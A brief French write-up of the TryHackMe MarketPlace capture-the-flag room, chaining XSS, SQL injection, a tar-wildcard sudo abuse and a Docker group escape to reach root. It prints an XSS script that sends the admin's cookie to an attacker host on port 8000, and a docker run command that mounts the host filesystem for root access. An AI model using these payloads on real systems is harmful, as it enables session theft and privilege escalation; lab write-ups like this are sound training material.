Writeup du challenge TryHackMe MarketPlace — chaîne XSS → SQLi → mouvement latéral → escalade Docker root.
Accès Initial — XSS sur JWT
Injection XSS dans la description d’un produit pour voler le token JWT de l’admin :
<script>
document.location=`http://${ipVPN}:8000?c=${document.cookie}`
</script>
Injection SQL
Avec le token admin, une injection SQL sur la fonctionnalité de recherche d’utilisateurs permet d’extraire les credentials SSH de l’utilisateur jake depuis la base de données.
Mouvement Latéral
Depuis le compte jake, exploitation des permissions sudo pour exécuter un script de backup en tant que michael. Abus d’un wildcard tar pour exécution de code.
Élévation Root — Docker
Le compte michael est membre du groupe docker. Montage du filesystem root dans un conteneur Alpine :
docker run -v /:/mnt alpine chroot /mnt
Accès root complet obtenu.
← retour aux articles